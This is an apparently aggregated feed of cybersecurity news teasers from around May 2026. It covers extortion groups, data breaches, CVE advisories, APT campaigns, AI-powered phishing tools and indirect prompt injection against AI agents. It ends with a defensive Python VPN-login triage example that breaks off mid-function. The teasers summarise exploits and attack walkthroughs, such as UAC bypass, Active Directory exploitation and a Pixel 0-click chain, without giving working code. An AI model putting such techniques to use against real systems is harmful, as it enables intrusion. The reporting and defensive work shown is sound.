Unit 42 explores trends in data theft and extortion, outlining key strategies for organizations as frontier AI models advance. The post Out of the Crypt: The Evolving Cyber Extortion Economy appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cyber-extortion-economy/

The AI Phishing Revolution: From Spray-and-Pray to Autonomous Operations
Evolution of AI Phishing As with most cyber threats, AI has created a fundamental shift in the phishing threat landscape. It has become a precision operation powered by AI systems that research, build, deliver, and adapt campaigns autonomously. AI acts as a force multiplier: it scales targeted techniques that previously required experience and time, while […] The post The AI Phishing Revolution: From Spray-and-Pray to Autonomous Operations appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/27/the-ai-phishing-revolution-from-spray-and-pray-to-autonomous-operations/?utm_source=rss&utm_medium=rss&utm_campaign=the-ai-phishing-revolution-from-spray-and-pray-to-autonomous-operations

AI Is Making Software Autonomous, and Governance Must Follow
In 2011, Marc Andreessen famously wrote that "software is eating the world." Today, software is no longer just a competitive advantage; it is the foundational infrastructure for nearly every industry. We don't merely use software — it is essential to the survival of the modern enterprise.
https://www.sonatype.com/blog/ai-is-making-software-autonomous-and-governance-must-follow

Ransom & Dark Web Issues Week 4, May 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 4, May 2026: Customer Data of Japanese Educational Franchise Sold on BreachForums by Hasan; Data from Japanese Government Agency for National Civil Servant Personnel Administration Sold on BreachForums by Hasan; FBI Issues Warning Regarding Fraudulent FIFA Websites Ahead of 2026 FIFA […]
https://asec.ahnlab.com/en/93881/

The proliferation and evolution of AI-powered hacking tools – how generative AI has changed the cyber attack ecosystem and response strategies
WormGPT, which emerged in June 2023, has brought a paradigm shift to the cybercrime ecosystem. Generative AI has lowered the barrier to entry for attacks, and AI-powered hacking tools are rapidly proliferating in both paid subscription services and free open source. Furthermore, AI is evolving beyond the creation of attack tools to the management of […]
https://asec.ahnlab.com/en/93875/

Football Fever Fuels Scam Campaigns Across Email and Social Media
Football fans are increasingly targeted by scams exploiting club loyalty, national teams, football collectibles, streaming demand, and the growing excitement around the FIFA World Cup 2026, according to Bitdefender Labs. Our most recent investigation uncovered more than 55 football-related malvertising campaigns targeting users through fake online stores, social media ads, IPTV piracy operations, fraudulent football apps, and FIFA-themed giveaway and lottery scams distributed through email.
https://www.bitdefender.com/en-us/blog/labs/football-fever-fuels-scam-campaigns-across-email-and-social-media

Designing secure access with ZTNA
New guidance explains how to design Zero Trust Network Access architectures aligned with zero trust principles and not built on old trust assumptions.
https://www.ncsc.gov.uk/blogs/designing-secure-access-with-ztna

What to consider before asking an AI chatbot for health advice
Using chatbots for medical advice could elicit hallucinations and even expose you to security and privacy risks. Here's what's at stake and how to stay safe.
https://www.welivesecurity.com/en/privacy/what-consider-asking-ai-chatbot-health-advice/

Proofpoint Introduces Active Exploits Protection to Help Organizations Prioritize Vulnerability Patching for Real-World Attacks in the AI Era

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-introduces-active-exploits-protection-help-organizations

SSH Labs
SSH is a widely used protocol that provides secure access to remote systems. It enables encrypted communication, file transfers, command execution and shell access for system administration. Visit https://sshlabs.compass-security.training to learn more about SSH security.
https://blog.compass-security.com/2026/05/ssh-labs/

Mytheresa - 84,108 breached accounts
In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date.
https://haveibeenpwned.com/Breach/Mytheresa

Ameriprise - 502,597 breached accounts
In March 2026, the financial services firm Ameriprise Financial was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group claimed possession of more than 200GB of compressed data exfiltrated from Ameriprise's Salesforce environment and internal SharePoint infrastructure, and subsequently published the data after negotiations allegedly failed. The published data contained 500k unique email addresses as well as names, phone numbers, physical addresses and employer information. In their disclosure to state attorneys general, Ameriprise reported 47,876 affected people; the larger email address population represents contacts from Ameriprise's broader operational systems, including internal staff. Ameriprise further advised that they have "implemented heightened monitoring...
https://haveibeenpwned.com/Breach/Ameriprise

Don't Trust 'Secure Mail'! Malicious Files Impersonating Credit Card Companies Are Being Distributed
AhnLab recently confirmed the distribution of malicious files disguised as security emails from a major credit card company in Korea. This attack has a similar flow to the Kimsuky group's past malicious LNK distribution case of disguising password files, but it is characterized by a change in the command execution of the initial LNK file. […]
https://asec.ahnlab.com/en/93855/

cPanel & WHM Authentication Bypass
What is the Vulnerability? CVE-2026-41940 is a critical authentication bypass vulnerability affecting WebPros cPanel & WHM, DNSOnly, and WP Squared installations. The vulnerability stems from improper handling of CRLF injection during the login and session-loading process, enabling attackers to forge authenticated sessions and gain unauthorized administrative access. Successful exploitation may allow remote unauthenticated attackers to obtain full administrative control of vulnerable hosting environments, potentially leading to website compromise, credential theft, web shell deployment, malicious configuration changes, and persistent access. CISA added CVE-2026-41940 to the Known Exploited Vulnerabilities...
https://fortiguard.fortinet.com/threat-signal-report/6447

Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability
What is the Attack? CVE-2026-20182 is a critical authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller and Manager deployments, including on-premises and cloud-managed environments. Cisco confirmed active exploitation in the wild. Attackers can impersonate trusted SD-WAN peers and establish authenticated control connections, ultimately obtaining high-privileged administrative access. Researchers note similarities to the previously exploited CVE-2026-20127 vulnerability, though Cisco states this is a distinct flaw. The vulnerability allows unauthenticated remote attackers to bypass device authentication and gain administrative privileges on vulnerable systems. CISA added the flaw...
https://fortiguard.fortinet.com/threat-signal-report/6448

BTMOB: A stealthy RAT burrowing deep into Android devices
The malware pairs remote access capabilities with ready-made campaign tools, lowering the barrier for full device compromise
https://www.welivesecurity.com/en/malware/btmob-stealthy-rat-burrowing-deep-android-devices/

Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks
Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks, influence operations and disinformation campaigns inside the European Union. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions, an Internet service provider sanctioned last year by the EU as a frequent staging ground for cyber mischief from Russia's intelligence agencies.
https://krebsonsecurity.com/2026/05/netherlands-seizes-800-servers-arrests-2-for-aiding-cyberattacks/

Lawmakers Demand Answers as CISA Tries to Contain Data Leak
Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials.
https://krebsonsecurity.com/2026/05/lawmakers-demand-answers-as-cisa-tries-to-contain-data-leak/

Verizon DBIR: Healthcare Fends Off Increased Social Engineering Attacks

https://www.proofpoint.com/us/newsroom/news/verizon-dbir-healthcare-fends-increased-social-engineering-attacks

Tracking Iranian APT Screening Serpens' 2026 Espionage Campaigns
Unit 42 details Screening Serpens' use of AppDomainManager hijacking and new RAT variants to target tech and defense sectors in recent campaigns.
https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/

Paved With Intent: ROADtools and Nation-State Tactics in the Cloud
Open-source framework ROADtools is being misused by threat actors for cloud intrusions. Learn how to identify its malicious use.
https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/

Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
Cloud Atlas attacks the public sector and diplomatic structures of Russia and Belarus, using ReverseSocks, SSH, and Tor for persistence in infected systems and its new tool, PowerCloud.
https://securelist.com/cloud-atlas-2026/119895/

Foul play: Fake FIFA websites target soccer fans looking for World Cup tickets, merchandise
Watch out for bogus World Cup websites that mimic official ticket and merchandise flows to steal money and personal data
https://www.welivesecurity.com/en/cybersecurity/foul-play-fake-fifa-world-cup-websites-tickets/

Alleged Kimwolf Botmaster 'Dort' Arrested, Charged in U.S. and Canada
Canadian authorities on Wednesday arrested a 23-year-old Ottawa man on suspicion of building and operating Kimwolf, a fast spreading Internet-of-Things botnet that enslaved millions of devices for use in a series of massive distributed denial-of-service (DDoS) attacks over the past six months. KrebsOnSecurity publicly named the suspect in February 2026 after the accused launched a volley of DDoS, doxing and swatting campaigns against this author and a security researcher. He now faces criminal hacking charges in both Canada and the United States.
https://krebsonsecurity.com/2026/05/alleged-kimwolf-botmaster-dort-arrested-charged-in-u-s-and-canada/

Proofpoint Integrates with the Claude Compliance API to Extend Data Security and Governance to Claude

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-integrates-claude-compliance-api-extend-data-security-and

Windows Privilege Escalation: Bypass UAC
Overview: This article delivers a complete, hands-on walkthrough of User Account Control (UAC) bypass techniques against a default-configured Windows 10 host. The walkthrough begins with […]
https://www.hackingarticles.in/windows-privilege-escalation-bypass-uac/

Spread and Evolution of AI-Based Hacking Tools – From Dark Web Distribution to Autonomous Attacks
Key takeaway: Since the emergence of WormGPT in June 2023, AI-based hacking tools have spread to the dark web, Telegram, GitHub, and Hugging Face. The market has evolved into a mix of paid subscription SaaS and free open-source distributions. Key capabilities have been segmented into phishing automation, malware development, reconnaissance, brute force, vulnerability exploitation, and […]
https://asec.ahnlab.com/en/93816/

April 2026 Threat Trend Report on APT Attacks (South Korea)
Overview: AhnLab utilized its infrastructure to monitor Advanced Persistent Threat (APT) attacks on targets in Korea. This report summarizes the classification, statistics, and features of each type of APT attack identified in Korea during the month of April 2026. Trends of APT Attacks in South Korea: Most of the APT attacks identified in Korea were […]
https://asec.ahnlab.com/en/93831/

The Missing Security Layer in AI-First Development
 
https://www.legitsecurity.com/blog/the-missing-security-layer-in-ai-first-development

1-15 May 2026 Cyber Attacks Timeline
The threat landscape during May H1 was dominated by cyber crime and characterized by malware attacks, while the exploitation of public-facing applications led the initial access.
https://www.hackmageddon.com/2026/05/21/1-15-may-2026-cyber-attacks-timeline/

Investigation update: GitHub Enterprise Server signing key rotation
GitHub Enterprise Server customers need to take immediate action.
https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/

A Detailed Guide on Nmap Firewall Scan
This walkthrough confirms an uncomfortable truth for defenders: flag-based firewall rules age poorly because Nmap supplies enough scan variants to circumvent any single combination. Length-based […]
https://www.hackingarticles.in/a-detailed-guide-on-nmap-firewall-scan/

Crypto Guest at Dawn Endpoint (Midnight) ransomware analysis
Summary: EndPoint is a ransomware variant formerly known as Midnight, which is believed to be built on the Babuk ransomware framework. It targets not only Windows environments, but also ESXi and NAS environments, and uses a double extortion method that combines file encryption with data exfiltration threats. Overview: Since the Babuk source code leak, several […]
https://asec.ahnlab.com/en/93932/

Ransom & Dark Web Issues Week 3, May 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 3, May 2026: Nova Ransomware Attack on South Korean Cosmetics and Chemical Firm; CoinbaseCartel, Data Leak Claim Against Open-Source Visualization Platform; TeamPCP Claimed Source Code Leak and Sale from Major Developer Platform
https://asec.ahnlab.com/en/93803/

Tracking TamperedChef Clusters via Certificate and Code Reuse
Unit 42 analyzes TamperedChef malware clusters that use trojanized productivity apps and malvertising to deliver stealthy payloads to targets.
https://unit42.paloaltonetworks.com/tracking-tampered-chef-clusters/

How an image could compromise your Mac: understanding an ExifTool vulnerability (CVE-2026-3102)
We explain how a flaw in ExifTool allows attackers to compromise macOS systems via a malicious image (CVE-2026-3102).
https://securelist.com/exiftool-compromise-mac/119866/

Webworm: New burrowing techniques
ESET researchers describe new tools and techniques that the Webworm APT group recently added to its arsenal
https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/

When Apps Expose User Data: 6 Ways Misconfigurations Break Customer Trust
Apps have quickly become part of everyday digital behavior. From photo enhancements to video transformations, users are uploading increasingly personal content, often without a second thought. That trust is implicit. Users assume that the platforms they engage with will handle their data responsibly. But recent findings tell a different story. A recent incident revealed that the Android app "Video AI Art Generator & Maker" exposed over 8 million media files, including nearly 2 mill...
https://cloudsecurityalliance.org/articles/when-apps-expose-user-data-6-ways-misconfigurations-break-customer-trust

How C-Suite Leaders Are Taming Shadow AI
Whether business leaders are ready or not, AI agents are transforming how companies do business. As recent studies have shown, employees are turning to AI to achieve productivity gains, even if it means doing so outside the IT department's control. A 2025 Gartner survey found that 69% of organizations suspect or have evidence that employees are using prohibited public GenAI, and Gartner projects that by 2030, more than 40% of enterprises will experience security or compliance incide...
https://cloudsecurityalliance.org/articles/how-c-suite-leaders-are-taming-shadow-ai

Microsoft's MSHTA Legacy Tool Still Powers Malware Campaigns on Windows
Bitdefender security researchers have discovered that attackers continue to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows

The quest for greater tech independence
A complete decoupling from US technology is neither realistic nor necessary, but the changing environment does require nations and companies to reassess their relationships and dependencies
https://www.welivesecurity.com/en/cybersecurity/quest-greater-tech-independence/

NetExec for OSCP: AD Pentesting
This walkthrough takes you end-to-end against a Windows Server 2019 domain controller in the ignite.local lab. You start exactly where the exam drops you […]
https://www.hackingarticles.in/netexec-for-oscp-ad-pentesting/

CISA Admin Leaked AWS GovCloud Keys on Github
Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history.
https://krebsonsecurity.com/2026/05/cisa-admin-leaked-aws-govcloud-keys-on-github/

Why Credential and Session Exposure Monitoring Should Be a Baseline Security Practice
Data breaches and ransomware incidents are often discussed as if they begin with a sophisticated…
https://latesthackingnews.com/2026/05/18/why-credential-and-session-exposure-monitoring-should-be-a-baseline-security-practice/

IT threat evolution in Q1 2026. Mobile statistics
This report contains mobile threat statistics for Q1 2026, along with noteworthy discoveries and quarterly trends: new versions of SparkCat and Triada.
https://securelist.com/malware-report-q1-2026-mobile-statistics/119819/

IT threat evolution in Q1 2026. Non-mobile statistics
The report presents key trends and statistics on malware that targeted personal computers running Windows and macOS, as well as Internet of Things (IoT) devices, during Q1 2026.
https://securelist.com/malware-report-q1-2026-pc-iot-statistics/119828/

RaccoonLine Publishes Analysis of VPN Data Disclosure Risks and the Shift Toward Decentralized Routing
Rome, Italy, 15th May 2026, CyberNewswire
https://latesthackingnews.com/2026/05/15/raccoonline-publishes-analysis-of-vpn-data-disclosure-risks-and-the-shift-toward-decentralized-routing/

Raising the bar: Quality, shared responsibility, and the future of GitHub's bug bounty program
We're updating our bug bounty program standards to prioritize quality submissions, clarify shared responsibility boundaries, and evolve how we reward low-risk findings.
https://github.blog/security/raising-the-bar-quality-shared-responsibility-and-the-future-of-githubs-bug-bounty-program/

Thinking carefully before adopting agentic AI
When it comes to using agentic AI, make sure you can walk before you run.
https://www.ncsc.gov.uk/blogs/thinking-carefully-before-adopting-agentic-ai

Why geopolitical turmoil is a gift for scammers, and how to stay safe
Conflict is a boon for opportunistic fraudsters. Look out for their ploys.
https://www.welivesecurity.com/en/scams/geopolitical-turmoil-gift-scammers-how-stay-safe/

Kimsuky targets organizations with PebbleDash-based tools
Kaspersky researchers analyze a range of new PebbleDash-based tools used in recent Kimsuky campaigns and reveal their connection to the AppleSeed malware cluster.
https://securelist.com/kimsuky-appleseed-pebbledash-campaigns/119785/

April 2026 Cyber Attacks Statistics
In April 2026, Cyber Crime continued to lead the Motivations, once again ahead of Cyber Espionage. Cyber Warfare took the third place, ahead of Hacktivism.
https://www.hackmageddon.com/2026/05/14/april-2026-cyber-attacks-statistics/

RaccoonLine Shares Technical Overview of VLESS Protocol in New Engineering Explainer
Rome, Italy, 13th May 2026, CyberNewswire
https://latesthackingnews.com/2026/05/13/raccoonline-shares-technical-overview-of-vless-protocol-in-new-engineering-explainer/

Linux Kernel Vulnerability copy.fail - CVE-2026-31431
CVSSv3 Score: 7.8. CVE-2026-31431: In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place. This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly. Revised on 2026-05-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-139

A 0-click exploit chain for the Pixel 10: When a Door Closes, a Window Opens
We recently published an exploit chain for the Google Pixel 9 that demonstrated it was possible to go from a zero-click context to root on Android in just two exploits. The Dolby 0-click vulnerability existed across all of Android, until it was patched in January 2026. While we had an exploit chain for the Pixel 9, we wanted to see if it was possible to write a similar exploit chain for Pixel 10. Updating the Dolby Exploit Altering our exploit for CVE-2025-54957 was fairly straightforward. The majority of needed changes involved updating offsets calculated for the specific version of the library we targeted on the Pixel 9 to similar offsets in the library for Pixel 10. The only challenge (outside of wishing we'd better documented which syncframes contained offsets) was that the Pixel 10...
https://projectzero.google/2026/05/pixel-10-exploit.html

Proofpoint Launches Dedicated MSP Business Unit and Introduces 365 Total Protection for North America

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-launches-dedicated-msp-business-unit-and-introduces-365-total

Patch Tuesday, May 2026 Edition
Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers -- including Apple, Google, Microsoft, Mozilla and Oracle -- fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.
https://krebsonsecurity.com/2026/05/patch-tuesday-may-2026-edition/

Arbitrary log file read in administrative interface
CVSSv3 Score: 4.0. An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability [CWE-88] in FortiDeceptor WEB UI may allow an authenticated attacker with at least read-only admin permission to read log files via crafted HTTP requests. Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-138

Command injection in CLI
CVSSv3 Score: 6.1. An improper neutralization of special elements used in an OS command ("OS Command Injection") vulnerability [CWE-78] in FortiAP, FortiAP-U & FortiAP-W2 CLI may allow an authenticated privileged attacker to execute unauthorized code or commands via crafted CLI requests. Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-131

DoS due to unsafe function in signal handler
CVSSv3 Score: 5.2. A Use of Potentially Dangerous Function vulnerability [CWE-676] in the FortiAnalyzer and FortiManager API may allow an authenticated attacker to cause a system hang via multiple specially crafted HTTP requests causing crashes. This happens only if internal locks are aligned, which is outside the attacker's control. Revised on 2026-05-12 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-26-137

Lyrie.ai Joins First Batch of Anthropic's Cyber Verification Program
Dubai, UAE, 11th May 2026, CyberNewswire
https://latesthackingnews.com/2026/05/11/lyrie-ai-joins-first-batch-of-anthropics-cyber-verification-program/

10 questions to ask when using AI models to find vulnerabilities
Using Artificial Intelligence to find vulnerabilities can bring added security considerations.
https://www.ncsc.gov.uk/blogs/10-questions-ask-using-ai-models-find-vulnerabilities

Introducing RAPTR
I'm happy to announce that we are releasing the beta version of RAPTR, a fully open source, API driven collaboration platform built specifically for red and purple team engagements.
https://blog.compass-security.com/2026/05/introducing-raptr/

The spy who logged me in.

https://www.proofpoint.com/us/newsroom/news/spy-who-logged-me

16-30 April 2026 Cyber Attacks Timeline
In the second timeline of April 2026 I collected 108 events, corresponding to an average of 7.2 events per day, a number that confirms a growing trend, driven by the increasing number of supply chain attacks, compared to the previous timeline, where I collected 94 events (6.27 events/day).
https://www.hackmageddon.com/2026/05/08/16-30-april-2026-cyber-attacks-timeline/

Canvas Breach Disrupts Schools & Colleges Nationwide
An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service's login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.
https://krebsonsecurity.com/2026/05/canvas-breach-disrupts-schools-colleges-nationwide/

Proofpoint Establishes Innovation Precedent for Source-Agnostic Modern Enterprise Investigations

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-establishes-innovation-precedent-source-agnostic-modern

AI and the New Threat Landscape | Sumit Dhawan with NightDragon | RSAC 2026

https://www.proofpoint.com/us/newsroom/news/ai-and-new-threat-landscape-sumit-dhawan-nightdragon-rsac-2026

Active Directory Exploitation with Metasploit
The walkthrough covers thirteen distinct attack phases: AD CS template reconnaissance, LDAP enumeration, Kerberos weakness discovery, credential extraction, SAMR account manipulation, Resource-Based Constrained Delegation abuse, […]
https://www.hackingarticles.in/active-directory-exploitation-with-metasploit/

The Most Powerful Women Of The Channel 2026: Power 100

https://www.proofpoint.com/us/newsroom/news/most-powerful-women-channel-2026-power-100

AI Coding Agents Are Redefining Cyber Risk — Is Your Exposure Strategy Ready?
AI coding tools have allowed engineering teams to double their output, and 64% of organizations…
https://latesthackingnews.com/2026/05/04/ai-coding-agents-are-redefining-cyber-risk-is-your-exposure-strategy-ready/

Stronger Cybersecurity, Stronger Business: NIST Celebrates 2026 National Small Business Week
Happy National Small Business Week! For over 60 years, the U.S. Small Business Administration has led this initiative to acknowledge the critical contributions of America's entrepreneurs and small business owners. Part of the U.S. Department of Commerce, NIST's mission is to drive U.S. innovation and global competitiveness, and the small business community is central to this mission. In this year's blog, we shine a spotlight on some new and upcoming NIST resources that are all focused on strengthening the cybersecurity and resilience of the nation's small business community. Build Your Small
https://www.nist.gov/blogs/cybersecurity-insights/stronger-cybersecurity-stronger-business-nist-celebrates-2026-national

Microsoft Shell Spoofing Zero-day Vulnerability
What is the Attack? A newly disclosed vulnerability, CVE-2026-32202, has emerged due to an incomplete patch by Microsoft for a previously exploited remote code execution flaw (CVE-2026-21510). While the original update addressed both RCE and SmartScreen bypass, it failed to eliminate a residual zero-click NTLM authentication coercion issue. This allows attackers to silently force a victim system to authenticate against a malicious server without user interaction. The threat activity has been linked to APT28 (also known as Fancy Bear / UAC-0001), which began exploiting the original vulnerability chain in December 2025, targeting organizations across Ukraine and the EU. Evidence confirms exploitation in the wild as early as...
https://fortiguard.fortinet.com/threat-signal-report/6429

Preparing for a ‘vulnerability patch wave'
Organisations must act now to prepare for a wave of patches that will address decades of technical debt.
https://www.ncsc.gov.uk/blogs/prepare-for-vulnerability-patch-wave

Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm's chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company's public image.
https://krebsonsecurity.com/2026/04/anti-ddos-firm-heaped-attacks-on-brazilian-isps/

Impacket for Pentester: Net
This article walks through three authentication paths that impacket-net supports — NTLM hash (Pass-the-Hash), Kerberos ticket, and AES key — and demonstrates how each one…
https://www.hackingarticles.in/impacket-for-pentester-net/

Operation Road Trap: Fake toll and parking texts are spreading worldwide
A new mass smishing campaign uncovered by Bitdefender Labs shows that scammers are sending tens of thousands of fraudulent text messages to mobile users across 12 countries, impersonating transport authorities, toll operators, and parking services. Key takeaways: since December 2025, Bitdefender Labs researchers have been tracking smishing campaigns targeting drivers on a global scale, and the scam campaigns are still active as of April 2026. Over 79,000 fraudulent messages have already been
https://www.bitdefender.com/en-us/blog/labs/operation-road-trap

Active Directory User Enumeration: A Comprehensive Guide
This article walks through sixteen distinct techniques for enumerating users inside Active Directory, drawing on the full spectrum of protocols an attacker can reach the…
https://www.hackingarticles.in/active-directory-user-enumeration-a-comprehensive-guide/

Securing the git push pipeline: Responding to a critical remote code execution vulnerability
How we validated, fixed, and investigated a critical vulnerability in under two hours, and confirmed no exploitation.
https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/

From DMV to Wallet: Understanding Verifiable Digital Credential Issuance
In our last post in this series, we compared two credential formats that shape the digital identity ecosystem: ISO/IEC 18013-5 and -7 mobile documents (mdocs) and W3C Verifiable Credentials (VCs). Both formats define how a credential is structured and shared, but neither can function without an issuance process. This blog post explores what it takes to issue verifiable digital credentials, with a focus on mobile driver's licenses (mDLs). We'll look at how issuance works today in practice, where inconsistencies exist, and how standards bodies (FIDO, ISO and OpenID Foundation) are working to
https://www.nist.gov/blogs/cybersecurity-insights/dmv-wallet-understanding-verifiable-digital-credential-issuance

Q1 2026 Cyber Attack Statistics
I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2026. In this period, I collected a total of 528 events (5.87 events/day) dominated by Cyber Crime with 66%, followed by Cyber Espionage with 18%, Hacktivism with 3%, and finally Cyber Warfare with 2%.
https://www.hackmageddon.com/2026/04/28/q1-2026-cyber-attack-statistics/

Tabletop Simulations: Where Theory Meets Reality
On paper, the vast majority of crisis plans look reasonable, actionable and complete. Once the rubber hits the road, however, chaos emerges quickly.
https://blog.compass-security.com/2026/04/tabletop-simulations-where-theory-meets-reality/

Scaling Our Vision: Welcoming Tamar Nulman and Omri Arnon to the Legit Team
https://www.legitsecurity.com/blog/scaling-our-vision-welcoming-tamar-nulman-and-omri-arnon-to-the-legit-team

Could your choice of metrics be harming your SOC?
Poor metrics can render a well-intentioned security operation centre entirely ineffective.
https://www.ncsc.gov.uk/blogs/could-your-choice-of-metrics-be-harming-your-soc

1-15 April 2026 Cyber Attacks Timeline
The first timeline of April 2026 brings an evolution in terms of methodology: from now on I will map the initial access techniques with the MITRE ATT&CK model. I also decided to merge the categories of Finance and Fintech in the sectors chart. From an event perspective, the first half of April 2026 confirmed a sustained trend...
https://www.hackmageddon.com/2026/04/24/1-15-april-2026-cyber-attacks-timeline/

AI threats in the wild: The current state of prompt injections on the web
Posted by Thomas Brunner, Yu-Han Liu, Moni Pande. At Google, our Threat Intelligence teams are dedicated to staying ahead of real-world adversarial activity, proactively monitoring emerging threats before they can impact users. Right now, Indirect Prompt Injection (IPI) is a top priority for the security community, anticipating it as a primary attack vector for adversaries to target and compromise AI agents. But while the danger of IPI is widely discussed, are threat actors actually exploiting this vector today, and if so, how? To answer these questions and to uncover real-world abuse, we initiated a broad sweep of the public web to monitor for known indirect prompt injection patterns. This is what we found. The threat of indirect prompt injection: unlike a direct injection where a user...
http://security.googleblog.com/2026/04/ai-threats-in-wild-current-state-of.html

NCSC: Leave passwords in the past - passkeys are the future
Passkeys are the more secure and user-friendly login method and should be the default authentication option for consumers.
https://www.ncsc.gov.uk/news/ncsc-leave-passwords-in-the-past-passkeys-are-the-future

International cyber agencies share fresh advice to defend against China-linked covert networks
New advisory highlights how to defend against attacker tactics believed to be used by China-linked actors to hide malicious cyber activity.
https://www.ncsc.gov.uk/news/international-cyber-agencies-fresh-advice-defend-against-china-linked-covert-networks

Supporting AI adoption for UK cyber defence
Adopting AI will require time, the development of new capabilities and careful oversight. 
https://www.ncsc.gov.uk/blogs/supporting-ai-adoption-for-uk-cyber-defence

Executive Summary: Defending against China-nexus covert networks of compromised devices
Organisations should map and baseline their edge device traffic, especially VPN and remote access connections, and adopt dynamic threat feed filtering that includes known covert network indicators.
https://www.ncsc.gov.uk/news/executive-summary-defending-against-china-nexus-covert-networks-of-compromised-devices
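The two recommendations in that summary, baseline who connects to your edge devices and filter against a covert-network indicator feed, are easy to state and rarely shown as code. The block below is an added example written for this page, not part of the NCSC advisory. The VPN gateway log lines, the indicator feed and the user names are all constructed; the log format, the /24 bucketing of source addresses and the function names are assumptions made for the example (a production baseline would normally key on ASN or ISP rather than /24, and the feed would be refreshed continuously rather than hard-coded).

```python
import ipaddress
import re
from collections import defaultdict

# Constructed VPN gateway log lines (not real data): a baseline window and
# a later window to triage. Format is an assumption for this example.
BASELINE_LOGS = """\
2026-04-01T07:58:01Z vpn-gw1 user=alice src=203.0.113.10 result=success
2026-04-02T08:02:44Z vpn-gw1 user=alice src=203.0.113.12 result=success
2026-04-03T09:15:20Z vpn-gw1 user=bob src=198.18.5.40 result=success
2026-04-05T18:40:03Z vpn-gw2 user=bob src=198.18.5.41 result=success
"""

NEW_LOGS = """\
2026-04-22T08:01:12Z vpn-gw1 user=alice src=203.0.113.31 result=success
2026-04-22T02:13:55Z vpn-gw1 user=alice src=198.51.100.23 result=success
2026-04-22T03:05:09Z vpn-gw2 user=bob src=192.0.2.77 result=failure
2026-04-22T11:22:47Z vpn-gw2 user=bob src=203.0.113.200 result=success
"""

# Constructed stand-in for a covert-network indicator feed: CIDRs believed to
# be compromised edge devices used as relays. A real feed changes daily.
COVERT_NETWORK_FEED = ["198.51.100.0/24", "192.0.2.77/32"]

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<gw>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)


def parse_events(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def source_network(ip_str):
    """Bucket a source address into its /24 (assumption for the example;
    production baselines usually key on ASN or ISP instead)."""
    return ipaddress.ip_network(f"{ip_str}/24", strict=False)


def build_baseline(events):
    """Map each user to the set of source networks seen in successful logins
    during the baseline window."""
    baseline = defaultdict(set)
    for e in events:
        if e["result"] == "success":
            baseline[e["user"]].add(source_network(e["src"]))
    return baseline


def load_feed(cidrs):
    return [ipaddress.ip_network(c) for c in cidrs]


def triage(events, baseline, feed):
    """Return (timestamp, user, src, reasons) for events worth an analyst's time.
    Indicator hits are reported for every attempt, failures included, because a
    failed login from a covert network is itself a sign of probing. A source
    network the user has never used before is reported only for successes."""
    findings = []
    for e in events:
        ip = ipaddress.ip_address(e["src"])
        reasons = []
        if any(ip in net for net in feed):
            reasons.append("covert-network-indicator")
        if e["result"] == "success" and source_network(e["src"]) not in baseline.get(e["user"], set()):
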